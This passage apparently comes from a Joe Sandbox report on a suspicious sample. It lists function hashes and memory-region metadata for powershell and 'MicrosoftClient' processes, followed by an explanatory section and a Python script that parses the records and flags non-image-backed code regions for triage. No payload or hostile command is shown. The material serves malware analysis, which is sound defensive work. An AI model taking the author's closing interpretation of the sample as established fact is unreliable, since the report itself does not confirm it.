                                                                                            • Source File: 0000000B.00000002.2655092393.00007FFD344A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD344A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_11_2_7ffd344a0000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: 8>n4
                                                                                            • API String ID: 0-3773068628
                                                                                            • Opcode ID: ca633f496c490a9643f606c64aed51062a85f2a7fec12cfe6f7775ce7e106a20
                                                                                            • Instruction ID: e7005d88ceb50038c741335eeb1d3ebd376cc00c691395e540af28b12e82552c
                                                                                            • Opcode Fuzzy Hash: ca633f496c490a9643f606c64aed51062a85f2a7fec12cfe6f7775ce7e106a20
                                                                                            • Instruction Fuzzy Hash: 2A515733B0EA560FE7E99A5C64A52B877D2DF96221B5900BBC24DC729BDD1CEC028341
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000B.00000002.2655092393.00007FFD344A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD344A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_11_2_7ffd344a0000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: 8>n4
                                                                                            • API String ID: 0-3773068628
                                                                                            • Opcode ID: e5255eae0fe16d8d22e5514755a67000d6cb3614da6116f09a17ec9dc11fbd30
                                                                                            • Instruction ID: 5517fa1c11914ee439f93c8fa3c00b628f1e3d36af65056e6da28ec5c3a8edc8
                                                                                            • Opcode Fuzzy Hash: e5255eae0fe16d8d22e5514755a67000d6cb3614da6116f09a17ec9dc11fbd30
                                                                                            • Instruction Fuzzy Hash: B121F233B0FA960FE7E5DA1C64B917866D2EF56221B5A00BAD24DC71ABCD5CEC059301
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000B.00000002.2655092393.00007FFD344A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD344A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_11_2_7ffd344a0000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: p>n4
                                                                                            • API String ID: 0-3192128902
                                                                                            • Opcode ID: ebf3bd615cf60ab6e4d6895176961cf6ecf84c205461fc3bcb0939a3c8ade7a8
                                                                                            • Instruction ID: 7048d13326d5912b5b2d8abd7d0665fb4979230687fcabe73b5fb002c913f576
                                                                                            • Opcode Fuzzy Hash: ebf3bd615cf60ab6e4d6895176961cf6ecf84c205461fc3bcb0939a3c8ade7a8
                                                                                            • Instruction Fuzzy Hash: D611E132B0F5494FE7E1EA5CA4A55B877D1EF86324B5A00FAD25CCB09BDD6DAC018340
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000B.00000002.2655092393.00007FFD344A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD344A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_11_2_7ffd344a0000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: (Bn4
                                                                                            • API String ID: 0-3977688063
                                                                                            • Opcode ID: 8eb04237c841061fc50f2d10c8547869e05405832ebf73bde496954e783df8d2
                                                                                            • Instruction ID: 6c939969a8a01000b84533a96eedad49fa4b7edd6981162025f4e40bf3d475dd
                                                                                            • Opcode Fuzzy Hash: 8eb04237c841061fc50f2d10c8547869e05405832ebf73bde496954e783df8d2
                                                                                            • Instruction Fuzzy Hash: E0110672B0FA894FEBA1DE9850A45B87BE1EF5A310F0500BFC58DDB197DD28A845C311
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000B.00000002.2653817790.00007FFD343D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343D0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_11_2_7ffd343d0000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: d16f604f305508859daab59c7dcb73f589788899ba7d4d001118bfdd631574e0
                                                                                            • Instruction ID: eb87131295946cdfd022f8b2d2b78a590076aac418ce33d5a436602d75707785
                                                                                            • Opcode Fuzzy Hash: d16f604f305508859daab59c7dcb73f589788899ba7d4d001118bfdd631574e0
                                                                                            • Instruction Fuzzy Hash: 65B1E662A4E7C54FE702AB6C5C691A57FB1EF63224F0801FBC1D8CB193D9296805CB92
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000B.00000002.2652574451.00007FFD342BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD342BD000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_11_2_7ffd342bd000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 4a02827043edf0971a6fd48766802e53a18aedf81a18593fc8c307c7824b88c3
                                                                                            • Instruction ID: 007b13bb36e21944e3cf8bac17d0e496552f6fbdce1f86ba9ff17a00608c3820
                                                                                            • Opcode Fuzzy Hash: 4a02827043edf0971a6fd48766802e53a18aedf81a18593fc8c307c7824b88c3
                                                                                            • Instruction Fuzzy Hash: 6641397140DBC44FE75A9B3998959523FF0EF57320B1906DFD088CB1A3DA29E846C792
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000B.00000002.2653817790.00007FFD343D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343D0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_11_2_7ffd343d0000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 195c22e560a656fa644cb9da7f8e134fa58a0d18e9d58e466411b9749018c1e8
                                                                                            • Instruction ID: 5db5850aeeb0722b71d66dc13e9a7038ad02d472d3a53df3b7ff53bd19e4cc4c
                                                                                            • Opcode Fuzzy Hash: 195c22e560a656fa644cb9da7f8e134fa58a0d18e9d58e466411b9749018c1e8
                                                                                            • Instruction Fuzzy Hash: 9221283190CB4C4FDB59EBAC988A7E97FF0EB97320F04416BD048C3152D675A846CB92
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000B.00000002.2653817790.00007FFD343D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343D0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_11_2_7ffd343d0000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                            • Instruction ID: 36244d86933e0c8f26a47dd4d49cb58ef4198a5314763e2dd3cfdd5a3badc4b9
                                                                                            • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                            • Instruction Fuzzy Hash: 5001677125CB0C4FD748EF4CE451AA5B7E0FB95364F10066DE58AC3651DA36E882CB46
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000B.00000002.2653817790.00007FFD343D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343D0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_11_2_7ffd343d0000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: d00dc50393e3a0a9ad6d5b2ff36c35a4c9d598d8c14f8e993442417b0de5d5cb
                                                                                            • Instruction ID: 3de50e4178f188941c343e9f3c8c38f822790f39a5207bca7b66efcf9f400824
                                                                                            • Opcode Fuzzy Hash: d00dc50393e3a0a9ad6d5b2ff36c35a4c9d598d8c14f8e993442417b0de5d5cb
                                                                                            • Instruction Fuzzy Hash: 03F02B36619A8C4FDB41EF2C98651D57FA0FF76205F0401BBD649C7121D7319418C7C2
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000B.00000002.2653817790.00007FFD343D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343D0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_11_2_7ffd343d0000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: N_^8$N_^<$N_^?$N_^J$N_^K$N_^N$N_^Q$N_^Y
                                                                                            • API String ID: 0-2388461625
                                                                                            • Opcode ID: c2f823834917604030f606e4ac28406e5d14685f992dda4079306600a8d4c0a4
                                                                                            • Instruction ID: b57d4ced5de6c3e749471d277341d97e57621474186b0dcfffcc35e3fe41a2cc
                                                                                            • Opcode Fuzzy Hash: c2f823834917604030f606e4ac28406e5d14685f992dda4079306600a8d4c0a4
                                                                                            • Instruction Fuzzy Hash: 25210473B095214AC31237FCBCA15D96B95DF5437935901F3E228DF113D929A4CB8682
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2839604923.00007FFD34400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34400000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_7ffd34400000_MicrosoftClient.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 13b2363eb1b8a8d8b2dd1ee54e702c961b18b5180a6da7bb5d2c28ec5d3d1841
                                                                                            • Instruction ID: 3d949980166e77dc58a5a01ca4f924df285c28328d2a6211571a4f03e6177cbf
                                                                                            • Opcode Fuzzy Hash: 13b2363eb1b8a8d8b2dd1ee54e702c961b18b5180a6da7bb5d2c28ec5d3d1841
                                                                                            • Instruction Fuzzy Hash: AC51E922B0D6950FDB12A7ACD8B20E9BBB0EF47211B0500B3D189EF1E3DD5D68468741
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2839604923.00007FFD34400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34400000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_7ffd34400000_MicrosoftClient.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: ba1c8e77e053c7bfb93c890648f74fbf327229882906838716b401b97ba75f2c
                                                                                            • Instruction ID: 4c5887526380da2f0ebf5ac8ec95f8ee70663ed3f2b6ef313eeb1586a4c2a9be
                                                                                            • Opcode Fuzzy Hash: ba1c8e77e053c7bfb93c890648f74fbf327229882906838716b401b97ba75f2c
                                                                                            • Instruction Fuzzy Hash: FBB18071B18A4D4FEBA8FB78D4B96BC7692FF89305B800479E50ED32D6CD6DA8118740
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2839604923.00007FFD34400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34400000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_7ffd34400000_MicrosoftClient.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 8446d8c45138a6a85ce82da151134349196b4fb3b80c0c03a006a6b2602d509f
                                                                                            • Instruction ID: 8114ee4431b706942a56305f6e3724f58f761c539b3432a1bab9bcf8b5745916
                                                                                            • Opcode Fuzzy Hash: 8446d8c45138a6a85ce82da151134349196b4fb3b80c0c03a006a6b2602d509f
                                                                                            • Instruction Fuzzy Hash: 6E512721B0E6CA0FE367A77898651B57BD6EF87210B0900FAD48DC71A7DC5DAC428352
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2839604923.00007FFD34400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34400000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_7ffd34400000_MicrosoftClient.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 9f0b9c5bbd0aae450f3e0dd491ac9a5c309b88fa3a509dff89f485b2ecbd0a00
                                                                                            • Instruction ID: 2b03115870c231cd78ae48705305ecad8d1542fabc070b438ecc2a1cc5ed672e
                                                                                            • Opcode Fuzzy Hash: 9f0b9c5bbd0aae450f3e0dd491ac9a5c309b88fa3a509dff89f485b2ecbd0a00
                                                                                            • Instruction Fuzzy Hash: 1051E52170DAC50FE796A77C88692A5BFE6EF8A211B0901FFE48DC72A3CD595C46C301
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2839604923.00007FFD34400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34400000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_7ffd34400000_MicrosoftClient.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 5a85bc3fad7d6edb89d971e41eaec9c3b2c1c4cf39e43834c1cd8f12c8e7b5f0
                                                                                            • Instruction ID: 8b60576aabe02a5bb78b357b790b19e81c36fa8b65ae0dd06ff58a82ce907b51
                                                                                            • Opcode Fuzzy Hash: 5a85bc3fad7d6edb89d971e41eaec9c3b2c1c4cf39e43834c1cd8f12c8e7b5f0
                                                                                            • Instruction Fuzzy Hash: BE31DB31B189490FE798EB6C886A679B6D2EB99305F05057EE44EC32E7DD699C418340
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2839604923.00007FFD34400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34400000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_7ffd34400000_MicrosoftClient.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 29cc076dbb1a0e0708ad7132376444d050d89f6b141d0c5bf05d3b55c5c8953f
                                                                                            • Instruction ID: 6895f910801b066b8c331df7f8e4082d05e2a927b92ea6bcbfc5a8536349ea47
                                                                                            • Opcode Fuzzy Hash: 29cc076dbb1a0e0708ad7132376444d050d89f6b141d0c5bf05d3b55c5c8953f
                                                                                            • Instruction Fuzzy Hash: 0F310721B18A094FEB90BBFC98693BDB7D1EF99311F05027BE00CC3297DD2858418392
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2839604923.00007FFD34400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34400000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_7ffd34400000_MicrosoftClient.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 7e5761186b747522a64c474cadec9a410adcfe2844b653f3f4421ca08714f998
                                                                                            • Instruction ID: d8833ba12f77b0615fc862858365a835a5bbb91bbcb3ca4122956b9bbe8bd297
                                                                                            • Opcode Fuzzy Hash: 7e5761186b747522a64c474cadec9a410adcfe2844b653f3f4421ca08714f998
                                                                                            • Instruction Fuzzy Hash: EB318F34B18A0E4FEB94EBA8D4B56FDBBB1FF99301F40047AD009D3286CD7968428B51
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2839604923.00007FFD34400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34400000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_7ffd34400000_MicrosoftClient.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 390f0469ffde37e6c15447b7b145209be9fa07bd110c4b2f4269ec976c94f390
                                                                                            • Instruction ID: ad58993d96ea1aa44c4fa930fe1cb58bb6924a5721b84e80d50eacff7f547eee
                                                                                            • Opcode Fuzzy Hash: 390f0469ffde37e6c15447b7b145209be9fa07bd110c4b2f4269ec976c94f390
                                                                                            • Instruction Fuzzy Hash: 80012B11A0DBC50FE752A73858A14757FE09F93310B0905BAED89C71EBDC4DA9419382
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000E.00000002.2922165353.00007FFD343E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343E0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_14_2_7ffd343e0000_MicrosoftClient.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 1d53384ef90c8f1723afc336f5e9769799e39f76c190dc6299468c61d9e4d8d4
                                                                                            • Instruction ID: 68a1efe6f57621559037f6805fa13b56010b478b80193d605c36ac3f3c61059d
                                                                                            • Opcode Fuzzy Hash: 1d53384ef90c8f1723afc336f5e9769799e39f76c190dc6299468c61d9e4d8d4
                                                                                            • Instruction Fuzzy Hash: 35B19372B599594FEB94F76890B96B977E2FF99300B840479E00ED36D2CD3DAC818740
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000E.00000002.2922165353.00007FFD343E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343E0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_14_2_7ffd343e0000_MicrosoftClient.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: c164d47195be08739173c598d41f8bf7889f49a3f0422c98dff20af7652fbfff
                                                                                            • Instruction ID: f925f30044acdecc01dc09381274a3b57b88e47a6b8ac155d6df7f0fd52e23b5
                                                                                            • Opcode Fuzzy Hash: c164d47195be08739173c598d41f8bf7889f49a3f0422c98dff20af7652fbfff
                                                                                            • Instruction Fuzzy Hash: 3E511821B5E6DA0FE767A77848652B67BE6EF87210B0900FAD48DC7193DC1D6C428351
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000E.00000002.2922165353.00007FFD343E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343E0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_14_2_7ffd343e0000_MicrosoftClient.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
• API String ID:
• Opcode ID: 72a67b809d1ea39ac47582664d8b5714af30e713e6a6ef77d65cc116876683a1
• Instruction ID: cdf1149206e1929e947d791df9fc7edefb2a60e8b8bda98f35e58abf3b874235
• Opcode Fuzzy Hash: 72a67b809d1ea39ac47582664d8b5714af30e713e6a6ef77d65cc116876683a1
• Instruction Fuzzy Hash: AB51F62170DBC50FE796A7B8886A275BFD6EF9A211B0901FFE48DC72A3CD595C468301

Memory Dump Source
• Source File: 0000000E.00000002.2922165353.00007FFD343E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_7ffd343e0000_MicrosoftClient.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: e3686a920ce7b7a0c4804a51573ef045e3387283531aa0fdaa2d6fb2fd147cba
• Instruction ID: 5698b76c1a13d2f73457459a650dc0c7a47bafd8f86c78fc51daf7d0e629f172
• Opcode Fuzzy Hash: e3686a920ce7b7a0c4804a51573ef045e3387283531aa0fdaa2d6fb2fd147cba
• Instruction Fuzzy Hash: 0B31D931B18A494FE798FB6C886A779B6D6EF99305F0805BEE44EC32D3DD689C418340

Memory Dump Source
• Source File: 0000000E.00000002.2922165353.00007FFD343E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_7ffd343e0000_MicrosoftClient.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 9ba19abf6db289d0f9bbc6d67876c49b17b9d7de48c421e07321187ef1aae3d3
• Instruction ID: a2128353297dbbeefcf56989491b17603c4363eafb8ee844d70e067f6e40d638
• Opcode Fuzzy Hash: 9ba19abf6db289d0f9bbc6d67876c49b17b9d7de48c421e07321187ef1aae3d3
• Instruction Fuzzy Hash: 8931C822B18A594FEB95BBBC58693BDB7E1FF99311F04017BE00DC3292DD2C58418392

Memory Dump Source
• Source File: 0000000E.00000002.2922165353.00007FFD343E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_7ffd343e0000_MicrosoftClient.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 5bd1cf5db4b5cf9231da5ec4f82c991114970207149aa7da79d1ad6cbdf14db2
• Instruction ID: b10bd7d06809509bbf9f143af0966dfe0eb176ba00188820c091ac6a58053788
• Opcode Fuzzy Hash: 5bd1cf5db4b5cf9231da5ec4f82c991114970207149aa7da79d1ad6cbdf14db2
• Instruction Fuzzy Hash: 3831A231B58A5A4FEB55FBA894B66EE77F1FF99300F94047AD009D3282CD396882C741

Memory Dump Source
• Source File: 0000000E.00000002.2922165353.00007FFD343E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_7ffd343e0000_MicrosoftClient.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 8e7c2f0ae030e34f4ba61ba58ff494b759e604ef2aa657933dbb220ce2823a18
• Instruction ID: a687c9bd25df3ede6bf633b88e2c0d882519b0e5129d849daff3fbb762d64b08
• Opcode Fuzzy Hash: 8e7c2f0ae030e34f4ba61ba58ff494b759e604ef2aa657933dbb220ce2823a18
• Instruction Fuzzy Hash: B9012B52E0D7D10FEB51773818A54767FE09B9731070C05AAECC8C71E7D81C99818782
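The records above are the per-function metadata Joe Sandbox emits for its disassembly: the memory dump each function was lifted from, whether that region is backed by a PE image ("based on PE: false" here for every function, all in the 00007FFD343E0000 dump of process 0000000E), and the opcode/instruction fuzzy hashes used for similarity matching. When triaging a long report, the useful first question is which regions hold code that is not image-backed, since that is where unpacked or JIT-generated payload lives. The following Python is an added example, not Joe Sandbox code and not part of the report: it parses records in this layout, groups functions by backing region and flags non-PE regions. The sample input is constructed to mirror the layout above (the two 7FFD343E0000 records reuse values from this section; the PE-backed record with API ID CreateFileW is invented for contrast). Reading the first two dotted fields of the .sdmp name as process and dump numbers is an inference from the snapshot file name hcaresult_14_2_7ffd343e0000 matching 0000000E/00000002, not a documented format.

```python
"""Parse Joe Sandbox function records (Memory Dump Source / Similarity
blocks) and group them by the memory region they were disassembled from.
Added example, not Joe Sandbox code; SAMPLE is constructed to mirror the
report layout."""
import re
from collections import defaultdict

# Constructed sample. The first two lines mimic the tail of a record whose
# header lies outside the excerpt (the parser must skip them); the last
# record (PE-backed, CreateFileW) is invented for contrast.
SAMPLE = """\
• Opcode Fuzzy Hash: 72a67b809d1ea39ac47582664d8b5714af30e713e6a6ef77d65cc116876683a1
• Instruction Fuzzy Hash: AB51F62170DBC50FE796A7B8886A275BFD6EF9A211B0901FFE48DC72A3CD595C468301
Memory Dump Source
• Source File: 0000000E.00000002.2922165353.00007FFD343E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_7ffd343e0000_MicrosoftClient.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: e3686a920ce7b7a0c4804a51573ef045e3387283531aa0fdaa2d6fb2fd147cba
• Instruction ID: 5698b76c1a13d2f73457459a650dc0c7a47bafd8f86c78fc51daf7d0e629f172
• Opcode Fuzzy Hash: e3686a920ce7b7a0c4804a51573ef045e3387283531aa0fdaa2d6fb2fd147cba
• Instruction Fuzzy Hash: 0B31D931B18A494FE798FB6C886A779B6D6EF99305F0805BEE44EC32D3DD689C418340
Memory Dump Source
• Source File: 0000000E.00000002.2922165353.00007FFD343E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343E0000, based on PE: false
• Snapshot File: hcaresult_14_2_7ffd343e0000_MicrosoftClient.jbxd
• API ID:
• Opcode ID: 9ba19abf6db289d0f9bbc6d67876c49b17b9d7de48c421e07321187ef1aae3d3
• Instruction ID: a2128353297dbbeefcf56989491b17603c4363eafb8ee844d70e067f6e40d638
• Opcode Fuzzy Hash: 9ba19abf6db289d0f9bbc6d67876c49b17b9d7de48c421e07321187ef1aae3d3
• Instruction Fuzzy Hash: 8931C822B18A594FEB95BBBC58693BDB7E1FF99311F04017BE00DC3292DD2C58418392
Memory Dump Source
• Source File: 00000003.00000002.1111111111.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Snapshot File: hcaresult_3_2_400000_constructed.jbxd
• API ID: CreateFileW
• Opcode ID: 0000
• Instruction ID: 0000
• Opcode Fuzzy Hash: 0000
• Instruction Fuzzy Hash: 0000
"""

SOURCE_RE = re.compile(
    r"Source File: (?P<file>[^,\s]+), Offset: (?P<offset>[0-9A-Fa-f]+), "
    r"based on PE: (?P<pe>true|false)"
)
FIELD_RE = re.compile(r"^\s*•\s*(?P<label>[^:]+):\s*(?P<value>.*)$")


def parse_records(text):
    """Return one dict per 'Memory Dump Source' record (bullet label -> value,
    plus parsed file/offset/pe_backed). Lines before the first header are
    dropped: they belong to a record whose header is outside the text."""
    records, current = [], None
    for line in text.splitlines():
        stripped = line.strip()
        if stripped == "Memory Dump Source":
            current = {}
            records.append(current)
            continue
        if current is None:
            continue
        m = SOURCE_RE.search(stripped)
        if m:
            current["file"] = m["file"]
            current["offset"] = int(m["offset"], 16)
            current["pe_backed"] = m["pe"] == "true"
            continue
        m = FIELD_RE.match(line)
        if m:  # empty fields such as 'API ID:' are kept as "" on purpose
            current[m["label"].strip()] = m["value"].strip()
    return records


def group_by_region(records):
    """Map (dump file, base offset, pe_backed) -> list of Opcode IDs."""
    regions = defaultdict(list)
    for r in records:
        regions[(r.get("file"), r.get("offset"), r.get("pe_backed"))].append(
            r.get("Opcode ID", ""))
    return dict(regions)


def non_pe_regions(records):
    """Regions the report marks 'based on PE: false': code with no on-disk
    image behind it (unpacked, JIT or injected), i.e. what to dump first."""
    return [{"file": f, "offset": off, "functions": len(ids),
             "unique_opcode_ids": len(set(ids))}
            for (f, off, pe), ids in group_by_region(records).items()
            if pe is False]


def process_index(file):
    """Assumed: the .sdmp name starts with hex process and dump numbers
    (0000000E.00000002 <-> hcaresult_14_2_...)."""
    parts = file.split(".")
    return int(parts[0], 16), int(parts[1], 16)


if __name__ == "__main__":
    for region in non_pe_regions(parse_records(SAMPLE)):
        print(f"non-PE region {region['offset']:016X} in {region['file']}: "
              f"{region['functions']} functions")
```

Running this over the full report text (rather than the constructed sample) gives a per-region function count that makes the unpacked-code region stand out even when the report lists hundreds of functions; the empty API ID and String ID fields on every record in this section mean none of these functions resolved an import or string reference, which is consistent with JIT-compiled .NET code rather than native code backed by an image.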